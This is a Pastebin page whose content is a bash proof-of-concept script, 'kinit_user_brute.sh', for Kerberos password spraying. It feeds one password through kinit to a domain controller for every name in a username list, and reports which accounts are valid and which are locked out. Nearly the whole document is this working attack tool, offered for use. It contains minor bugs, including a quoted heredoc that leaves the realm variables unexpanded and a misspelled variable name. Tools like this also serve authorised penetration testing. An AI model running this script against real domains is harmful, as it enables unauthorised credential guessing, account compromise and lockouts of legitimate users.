API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 28th, 2017
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. # Title: kinit_user_brute.sh
  4. # Author: @ropnop
  5. # Description: This is a PoC for doing horiztonal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
  6. # The script configures the realm and KDC for you based on the domain provided and the domain controller
  7. # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
  8. # Only tested with Heimdal kerberos (error messages might be different for MIT clients)
  9.  
  10.  
  11. DOMAIN=$1
  12. DOMAINCONTROLLER=$2
  13. WORDLIST=$3
  14. PASSWORD=$4
  15.  
  16. if [[ $# -ne 4 ]]; then
  17. echo "[!] Usage: ./kinit_user_brute.sh <domain> <domain controller> <username list> <password>"
  18. echo "[!] Example: ./kinit_user_brute.sh contoso.com dc1.contoso.com usernames.txt Password123"
  19. exit 1
  20. fi
  21.  
  22. DOMAIN=$(echo $DOMAIN | awk '{print toupper($0)}')
  23.  
  24. echo "[+] Kerberos Realm: $DOMAIN"
  25. echo "[+] KDC: $DOMAINCONTROLLER"
  26. echo ""
  27.  
  28. KRB5_CONF=$(mktemp)
  29.  
  30. cat > $KRB5_CONF <<'asdfasdf'
  31. [libdefaults]
  32. default_realm = $DOMAIN
  33. [realms]
  34. $DOMAIN = {
  35. kdc = $DOMAINCONTROLLER
  36. admin_server = $DOMAINCONTROLLER
  37. }
  38. asdfasdf
  39.  
  40. START_TIME=$SECONDS
  41. COUNT=0
  42.  
  43. while read USERNAME; do
  44. USERNAWME=$(echo $USERNAME | awk -F@ '{print $1}')
  45. RESULT=$(
  46. echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1
  47. )
  48. if [[ $RESULT == *"unable to reach"* ]]; then
  49. echo "[!] Unable to find KDC for realm. Check domain and DC"
  50. exit 1
  51. elif [[ $RESULT == *"Wrong realm"* ]]; then
  52. echo "[!] Wrong realm. Make sure domain and DC are correct"
  53. exit 1
  54. elif [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
  55. echo "[!] $USERNAME is locked out!"
  56. elif [[ $RESULT == *"Client"* ]] && [[ $RESULT == *"unknown"* ]]; then
  57. # username does not exist
  58. : # pass
  59. elif [[ -z "$RESULT" ]]; then
  60. echo "[+] Valid: $USERNAME@$DOMAIN : $PASSWORD"
  61. else
  62. echo "[+] Error trying $USERNAME: $RESULT"
  63. fi
  64. COUNT=$(($COUNT+1))
  65. done <$WORDLIST
  66.  
  67. echo ""
  68. echo "Tested \"$PASSWORD\" against $COUNT users in $(($SECONDS - $START_TIME)) seconds"
  69. echo ""
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!